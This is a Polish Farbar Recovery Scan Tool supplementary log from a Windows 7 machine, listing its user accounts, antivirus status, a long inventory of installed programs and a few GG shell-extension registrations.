Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 11-10-2017 Uruchomiony przez Agata (13-10-2017 02:35:27) Uruchomiony z C:\Users\Agata\Desktop\Agata Windows 7 Home Premium Service Pack 1 (X64) (2010-08-30 15:23:22) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-233006258-18527085-3623643150-500 - Administrator - Disabled) Agata (S-1-5-21-233006258-18527085-3623643150-1000 - Administrator - Enabled) => C:\Users\Agata Gość (S-1-5-21-233006258-18527085-3623643150-501 - Limited - Enabled) HomeGroupUser$ (S-1-5-21-233006258-18527085-3623643150-1006 - Limited - Enabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189} AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34} AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 64 Bit HP CIO Components Installer (HKLM\...\{55D55008-E5F6-47D6-B16F-B2A40D4D145F}) (Version: 6.2.1 - Hewlett-Packard) Hidden Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 15.023.20053 - Adobe Systems Incorporated) Adobe Flash Player 27 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 27.0.0.159 - Adobe Systems Incorporated) Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.159 - Adobe Systems Incorporated) AIO_Scan (HKLM-x32\...\{D86B0E2E-DF9A-441C-AF77-8D1A0FF00FA6}) (Version: 130.0.365.000 - Hewlett-Packard) Hidden Any Video Converter Professional 3.2.3 (HKLM-x32\...\Any Video Converter Professional_is1) (Version: - Any-Video-Converter.com) Atheros Client Installation Program (HKLM-x32\...\{D1434266-0486-4469-B338-A60082CC04E1}) (Version: 1.0.2.1119 - Atheros) ATI Catalyst Install Manager (HKLM\...\{6C30F9EF-5032-925C-1905-D87E8472EB85}) (Version: 3.0.825.0 - ATI Technologies, Inc.) Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team) Audacity 2.1.3 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.3 - Audacity Team) Audio Video Synchronizer version 1.0.0.0 (HKLM-x32\...\Audio Video Synchronizer_is1) (Version: - ) AVS Screen Capture version 2.0.1 (HKLM-x32\...\AVS Screen Capture_is1) (Version: - Online Media Technologies Ltd.) AVS Update Manager 1.0 (HKLM-x32\...\AVS Update Manager_is1) (Version: - Online Media Technologies Ltd.) AVS Video Editor 6 (HKLM-x32\...\AVS Video Editor_is1) (Version: - Online Media Technologies Ltd.) AVS Video Recorder 2.4 (HKLM-x32\...\AVS Video Recorder_is1) (Version: - Online Media Technologies Ltd.) AVS4YOU Software Navigator 1.4 (HKLM-x32\...\AVS4YOU Software Navigator_is1) (Version: - Online Media Technologies Ltd.) BatteryLifeExtender (HKLM-x32\...\{08B67A13-8501-48CB-B747-9D413BDC4594}) (Version: 1.0.3 - Samsung) BenVista PhotoZoom Pro 6.0.8 (HKU\S-1-5-21-233006258-18527085-3623643150-1000\...\PhotoZoom Pro 6) (Version: 6.0.8 - BenVista Ltd.) Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 5.60.48.44 - Broadcom Corporation) BufferChm (HKLM-x32\...\{2EEA7AA4-C203-4b90-A34F-19FB7EF1C81C}) (Version: 130.0.331.000 - Hewlett-Packard) Hidden C7200 (HKLM-x32\...\{EE5926BD-9590-48A3-AB1E-C1C49575823D}) (Version: 130.0.365.000 - Hewlett-Packard) Hidden C7200_Help (HKLM-x32\...\{c600ab3d-8b64-41df-bf36-b3d87ce0706b}) (Version: 100.0.206.000 - Hewlett-Packard) Hidden CDBurnerXP (HKLM\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.3.8.2568 - CDBurnerXP) CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.7.6623 - CDBurnerXP) CGS15_IPM_T2 (HKLM-x32\...\{05D18A0F-ED9D-4FBD-9BF5-AF632EB09CB3}) (Version: 15.0 - Corel Corporation) Hidden Content (HKLM-x32\...\{B369483E-0728-405C-8F8C-3427B263B01F}) (Version: 1.00.0000 - Your Company Name) Hidden ConvertHelper 2.2 (HKLM-x32\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF51}_is1) (Version: - DownloadHelper) ConvertHelper 3.1.1 (HKLM\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF52}}_is1) (Version: - DownloadHelper) Copy (HKLM-x32\...\{3C92B2E6-380D-4fef-B4DF-4A3B4B669771}) (Version: 130.0.428.000 - Hewlett-Packard) Hidden Corel Painter 11 - ICA (HKLM-x32\...\{5B51BB5F-4E7C-4275-A653-E98534E9C1D2}) (Version: 11.0 - Corel Corporation) Hidden Corel Painter 11 - IPM (HKLM-x32\...\{7EC69F77-5494-4E1F-8BC6-956DAA5A91F2}) (Version: 11.2 - Corel Corporation) Hidden Corel Painter 11 (HKLM-x32\...\_{5B51BB5F-4E7C-4275-A653-E98534E9C1D2}) (Version: - Corel Corporation) Corel Painter 11 (HKLM-x32\...\{28F8F8F0-C278-454A-9507-46B344AAD188}) (Version: 11.2 - Corel Corporation) Hidden CorelDRAW Graphics Suite 12 (HKLM-x32\...\{505AFDC0-5E72-4928-8368-5DEA385E3647}) (Version: 12.0.0.536 - Corel Corporation) CorelDRAW Graphics Suite X5 - Capture (HKLM-x32\...\{EDB98D5A-A6FB-425C-BFB7-51A0924B762D}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Common (HKLM-x32\...\{CA3861BA-1D96-4D66-B577-318E1602C4F3}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Connect (HKLM-x32\...\{54B8F4A1-02B0-4D32-8F37-925526C0EEC6}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Custom Data (HKLM-x32\...\{24D9A3E0-D086-4B62-AF93-63CF6B05CB48}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Draw (HKLM-x32\...\{62978C1C-FE2E-4A4E-851D-3EB406C9EBC2}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Filters (HKLM-x32\...\{3472C84E-2FD0-439F-B27F-C290C1E4CD8B}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - FontNav (HKLM-x32\...\{983F7145-CABF-4EDD-9F3D-E06B2F024BD3}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - PHOTO-PAINT (HKLM-x32\...\{A1B04B6B-25BB-48AD-8BD9-D31A86E89F3E}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Photozoom Plugin (HKLM-x32\...\{D642FF8D-438D-4545-A1D5-2EDB4BCAE3BA}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - PL (HKLM-x32\...\{938C2383-A692-4D2C-AE45-024F91EF7B1D}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Redist (HKLM-x32\...\{59123CCF-FED2-46FF-9293-D1DC80042219}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Setup Files (HKLM-x32\...\{CE54DCE1-E00A-4D91-ACB9-A2D916C24051}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - VBA (HKLM-x32\...\{57400C1E-BC51-4ECE-AD2A-A6096204DDEC}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - VideoBrowser (HKLM-x32\...\{FE4B83DE-85CF-4DE5-90CE-A2735A0E1F21}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - VSTA (HKLM-x32\...\{260ED378-2B8C-4831-ADAE-D0712D119AC5}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - WT (HKLM-x32\...\{9244E956-5939-4B88-930C-0699D4AB2B95}) (Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 (HKLM-x32\...\{B399C91E-96F2-4265-9884-1C9A10E9FCF4}) (Version: 15.0 - Corel Corporation) Hidden CPUID HWMonitor 1.32 (HKLM\...\CPUID HWMonitor_is1) (Version: 1.32 - ) CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 2.0.3911 - CyberLink Corp.) D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden Destinations (HKLM-x32\...\{BD7204BA-DD64-499E-9B55-6A282CDF4FA4}) (Version: 130.0.0.0 - Hewlett-Packard) Hidden DeviceDiscovery (HKLM-x32\...\{2FF8C687-DB7D-4adc-A5DC-57983EC25046}) (Version: 130.0.465.000 - Hewlett-Packard) Hidden DocProc (HKLM-x32\...\{9B362566-EC1B-4700-BB9C-EC661BDE2175}) (Version: 13.0.0.0 - Hewlett-Packard) Hidden Easy Content Share (HKLM-x32\...\{2DDC70C1-C77A-4D08-89D2-9AB648504533}) (Version: 1.0.0.13 - Samsung Electronics Co., LTD) Easy Display Manager (HKLM-x32\...\{17283B95-21A8-4996-97DA-547A48DB266F}) (Version: 3.2 - Samsung Electronics Co., Ltd.) Easy Network Manager (HKLM-x32\...\{F771F1D4-EDD4-4D68-82DC-811583C099CD}) (Version: 4.3.1 - Samsung) Easy SpeedUp Manager (HKLM-x32\...\{EF367AA4-070B-493C-9575-85BE59D789C9}) (Version: 2.1.0.11 - Samsung Electronics Co.,Ltd.) EasyBatteryManager (HKLM-x32\...\{4A331D24-A9E8-484F-835E-1BA7B139689C}) (Version: 4.0.0.4 - Samsung) EasyFileShare (HKLM-x32\...\{C4582EED-A3FB-4358-8F3F-8C994460DF28}) (Version: 1.0.3 - Samsung) ETDWare PS/2-x64 7.0.7.0_WHQL (HKLM\...\Elantech) (Version: 7.0.7.0 - ELAN Microelectronics Corp.) Fax (HKLM-x32\...\{440B915A-0C85-45DB-92AE-75AE14704A64}) (Version: 130.0.418.000 - Hewlett-Packard) Hidden Galeria fotografii (HKLM-x32\...\{77655DF6-A143-4A25-A5F8-127C8CE63EDA}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Game Pack (HKLM-x32\...\{D1F6FBBB-B204-459A-9BF8-D06FFAB96CCC}_is1) (Version: 6.3.1.1 - Oberon Media, Inc.) GG (HKU\S-1-5-21-233006258-18527085-3623643150-1000\...\GG) (Version: 12 - GG Network S.A.) GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team) GPBaseService2 (HKLM-x32\...\{63FF21C9-A810-464F-B60A-3111747B1A6D}) (Version: 130.0.371.000 - Hewlett-Packard) Hidden Hewlett-Packard ACLM.NET v1.1.0.0 (HKLM-x32\...\{6F340107-F9AA-47C6-B54C-C3A19F11553F}) (Version: 1.00.0000 - Hewlett-Packard) Hidden HP Imaging Device Functions 13.0 (HKLM\...\HP Imaging Device Functions) (Version: 13.0 - HP) HP Photosmart All-In-One Driver Software 13.0 Rel. 2 (HKLM\...\{988329F4-A1A1-4D51-803C-EF2725A97627}) (Version: 13.0 - HP) HP Photosmart Essential 3.5 (HKLM\...\HP Photosmart Essential) (Version: 3.5 - HP) HP Smart Web Printing 4.51 (HKLM\...\HP Smart Web Printing) (Version: 4.51 - HP) HP Solution Center 13.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 13.0 - HP) HP Support Solutions Framework (HKLM-x32\...\{FC3C2B77-6800-48C6-A15D-9D1031130C16}) (Version: 11.51.0049 - Hewlett-Packard Company) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HPDiagnosticAlert (HKLM-x32\...\{846B5DED-DC8C-4E1A-B5B4-9F5B39A0CACE}) (Version: 1.00.0000 - Microsoft) Hidden HPPhotoGadget (HKLM-x32\...\{CAE4213F-F797-439D-BD9E-79B71D115BE3}) (Version: 130.0.282.000 - Hewlett-Packard) Hidden HPPhotoSmartDiscLabel_PaperLabel (HKLM-x32\...\{D9D8F2CF-FE2D-4644-9762-01F916FE90A9}) (Version: 2.04.0000 - Hewlett-Packard) Hidden HPPhotoSmartDiscLabel_PrintOnDisc (HKLM-x32\...\{20EFC9AA-BBC1-4DFD-81FF-99654F71CBF8}) (Version: 2.04.0000 - Hewlett-Packard) Hidden HPPhotoSmartDiscLabelContent1 (HKLM-x32\...\{681B698F-C997-42C3-B184-B489C6CA24C9}) (Version: 2.04.0000 - Hewlett-Packard) Hidden hpphotosmartdisclabelplugin (HKLM-x32\...\{B28635AB-1DF3-4F07-BFEA-975D911B549B}) (Version: 2.04.0000 - Hewlett-Packard) Hidden HPPhotosmartEssential (HKLM-x32\...\{D79113E7-274C-470B-BD46-01B10219DF6A}) (Version: 2.04.0000 - Hewlett-Packard) Hidden HPProductAssistant (HKLM-x32\...\{C43326F5-F135-4551-8270-7F7ABA0462E1}) (Version: 130.0.371.000 - Hewlett-Packard) Hidden IconHandler 32 bit (HKLM-x32\...\{1AED4ABF-0852-4B3F-9F87-00CF88F25CE0}) (Version: 2.0 - Corel Corporation) Hidden IconHandler 64 bit (HKLM\...\{4E82E2E9-668B-4F8A-814A-78E163FCDBCD}) (Version: 2.0 - Corel Corporation) Hidden Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.3.1001 - Intel Corporation) Intel(R) Turbo Boost Technology Driver (HKLM-x32\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.02.00.1002 - Intel Corporation) ipla 2.8.7 (HKLM-x32\...\ipla) (Version: 2.8.7 - Redefine Sp z o.o.) JScreenFix (HKU\S-1-5-21-233006258-18527085-3623643150-1000\...\JScreenFix) (Version: - JADS Limited) Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden K-Lite Mega Codec Pack 13.3.5 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 13.3.5 - KLCP) LADSPA_plugins-win-0.4.15 (HKLM-x32\...\LADSPA_plugins-win_is1) (Version: - Audacity Team) LAME v3.98.2 for Audacity (HKLM-x32\...\LAME for Audacity_is1) (Version: - ) Langauge (HKLM-x32\...\{840BF2FE-033D-437C-89D1-AAA206BA13B6}) (Version: 1.2 - Your Company Name) Hidden Malwarebytes Anti-Malware wersja 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) Marvell Miniport Driver (HKLM-x32\...\Marvell Miniport Driver) (Version: 11.22.3.3 - Marvell) Microsoft .NET Framework 4.7 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02053 - Microsoft Corporation) Microsoft .NET Framework 4.7 (Polski) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1045) (Version: 4.7.02053 - Microsoft Corporation) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation) Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0415-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation) Microsoft Office PowerPoint Viewer 2007 (Polish) (HKLM-x32\...\{95120000-00AF-0415-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110415-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation) Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Works (HKLM-x32\...\{306B39C9-3AB1-4161-8567-9C7E50B41AE3}) (Version: 9.7.0621 - Microsoft Corporation) Morphyre (HKLM-x32\...\Morphyre) (Version: - ) Movie Maker (HKLM-x32\...\{DAE8CC57-EBF5-4D46-8572-9A0C769D6F16}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Mozilla Firefox 56.0.1 (x64 pl) (HKLM\...\Mozilla Firefox 56.0.1 (x64 pl)) (Version: 56.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 56.0.1.6484 - Mozilla) MP3 2 Ogg Lab 2004 (HKLM-x32\...\MP3 2 Ogg Lab 2004_is1) (Version: - MP3 Surgeon) Mp3tag v2.84a (HKLM-x32\...\Mp3tag) (Version: 2.84a - Florian Heidenreich) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation) MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation) MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation) MSXML 4.0 SP3 Parser (KB973685) (HKLM-x32\...\{859DFA95-E4A6-48CD-B88E-A3E483E89B44}) (Version: 4.30.2107.0 - Microsoft Corporation) Nature Illusion Studio (HKLM-x32\...\Nature Illusion Studio) (Version: 3.41 - Nufsoft) Network64 (HKLM\...\{05EFBF37-0E52-4579-875C-7EEF0DFB4FCB}) (Version: 130.0.572.000 - Hewlett-Packard) Hidden Network64 (HKLM\...\{6BFAB6C1-6D46-46DB-A538-A269907C9F2F}) (Version: 140.0.221.000 - Hewlett-Packard) Hidden OCR Software by I.R.I.S. 13.0 (HKLM\...\HPOCR) (Version: 13.0 - HP) Pakiet zgodności dla systemu Office 2007 (HKLM-x32\...\{90120000-0020-0415-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation) Pen Pad Driver with Macro Key Manager (HKLM-x32\...\Rmtablet) (Version: - ) PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation) PMB (HKLM-x32\...\{B6A98E5F-D6A7-46FB-9E9D-1F7BF443491C}) (Version: 5.5.02.12220 - Sony Corporation) Poczta usługi Windows Live (HKLM-x32\...\{45FF54A4-ECD4-455D-89A2-D209737AD726}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Podstawowe programy Windows Live (HKLM-x32\...\{8FFD72FC-4FFA-472D-9F76-AEC85F602F9D}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Podstawowe programy Windows Live (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation) PS_AIO_02_ProductContext (HKLM-x32\...\{B4B2096B-B13E-408E-8985-BD07463D5487}) (Version: 130.0.365.000 - Hewlett-Packard) Hidden PS_AIO_02_Software (HKLM-x32\...\{94F8D42D-BB31-4858-9705-7D756D8D9655}) (Version: 130.0.365.000 - Hewlett-Packard) Hidden PS_AIO_02_Software_Min (HKLM-x32\...\{685B0843-6C8D-4E42-B60D-2B86B45526E0}) (Version: 130.0.365.000 - Hewlett-Packard) Hidden Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7404 - Realtek Semiconductor Corp.) REALTEK Wireless LAN Software (HKLM-x32\...\{0F796312-289C-40CA-856C-9FBCF5E83342}) (Version: 0133.09.1202 - REALTEK Semiconductor Corp.) Recuva (HKLM\...\Recuva) (Version: 1.38 - Piriform) S Agent (HKLM\...\{026F3E93-09A9-4BB0-B3D6-2D84A9EA8AA1}) (Version: 1.1.51 - Samsung Electronics CO., LTD.) Hidden Samsung Recovery Solution 4 (HKLM-x32\...\{145DE957-0679-4A2A-BB5C-1D3E9808FAB2}) (Version: 4.0.0.6 - Samsung) Samsung Support Center (HKLM-x32\...\{F687E657-F636-44DF-8125-9FEEA2C362F5}) (Version: 1.0.2 - Samsung) Samsung Update Plus (HKLM-x32\...\{D3F2FAA5-FEC4-42AA-9ABA-1F763919A2B5}) (Version: 2.0 - Samsung Electronics Co., Ltd.) Scan (HKLM-x32\...\{0F367CA3-3B2F-43F9-A44A-25A8EE69E45D}) (Version: 13.0.0.0 - Hewlett-Packard) Hidden Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation) Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.) SmartWebPrinting (HKLM-x32\...\{DC635845-46D3-404B-BCB1-FC4A91091AFA}) (Version: 130.0.457.000 - Hewlett-Packard) Hidden SoftSkies (HKLM-x32\...\SoftSkies) (Version: 1.5.2 - SoundSpectrum) SolutionCenter (HKLM-x32\...\{4A70EF07-7F88-4434-BB61-D1DE8AE93DD4}) (Version: 130.0.373.000 - Hewlett-Packard) Hidden Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.14.8.201405281228 - Sony Mobile Communications AB) Sony PC Companion 2.10.206 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.206 - Sony) Spotify (HKU\S-1-5-21-233006258-18527085-3623643150-1000\...\Spotify) (Version: 1.0.49.125.g72ee7853 - Spotify AB) Status (HKLM-x32\...\{0EF5BEA9-B9D3-46d7-8958-FB69A0BAEACC}) (Version: 130.0.469.000 - Hewlett-Packard) Hidden swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden System Requirements Lab for Intel (HKLM-x32\...\{04C4B49D-45D9-4A28-9ED1-B45CBD99B8C7}) (Version: 4.5.24.0 - Husdawg, LLC) TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.83369 - TeamViewer) Toolbox (HKLM-x32\...\{6BBA26E9-AB03-4FE7-831A-3535584CA002}) (Version: 130.0.648.000 - Hewlett-Packard) Hidden TrayApp (HKLM-x32\...\{1EC71BFB-01A3-4239-B6AF-B1AE656B15C0}) (Version: 130.0.422.000 - Hewlett-Packard) Hidden UDPixel.exe (HKLM-x32\...\UDPixel) (Version: - ) UnloadSupport (HKLM-x32\...\{4E7C28C7-D5DA-4E9F-A1CA-60490B54AE35}) (Version: 11.0.0 - Hewlett-Packard) Hidden User Guide (HKLM-x32\...\{BAE68339-B0F6-4D33-9554-5A3DB2DFF5DA}) (Version: 1.0 - ) VBA (2627.01) (HKLM-x32\...\{5545EEE1-FA36-4F76-B6BE-5696E7F4E2D6}) (Version: 6.03.00.9188 - Microsoft Corporation) Hidden VirtualDub Filter Pack 1.0 (HKLM-x32\...\VirtualDub Filter Pack_is1) (Version: - Dee Mon) VST Bridge 1.1 (HKLM-x32\...\VST Bridge_is1) (Version: - ) WebReg (HKLM-x32\...\{43CDF946-F5D9-4292-B006-BA0D92013021}) (Version: 130.0.132.017 - Hewlett-Packard) Hidden WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.4700 - Broadcom Corporation) Windows Live Sync (HKLM-x32\...\{E580DFEA-3F1D-4B56-9115-984217032FF5}) (Version: 14.0.8117.416 - Microsoft Corporation) Windows Media Player Yule Log Visualization (HKLM-x32\...\{47CEA7F4-73CA-4E15-BF14-BCB857EAEF53}) (Version: 1.0.1 - Sean Alexander and Microsoft) Windows Movie Maker 2.6 (HKLM-x32\...\{B3DAF54F-DB25-4586-9EF1-96D24BB14088}) (Version: 2.6.4037.0 - Microsoft Corporation) WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version: - ) WMV9/VC-1 Video Playback (HKLM\...\{E34038BB-5358-3890-B5C8-37C5FE817806}) (Version: 1.0.60419.2210 - ATI Technologies Inc.) Hidden ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-233006258-18527085-3623643150-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Agata\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll (GG Network S.A.) ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll [2012-06-05] (GG Network S.A.) ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll [2012-06-05] (GG Network S.A.) 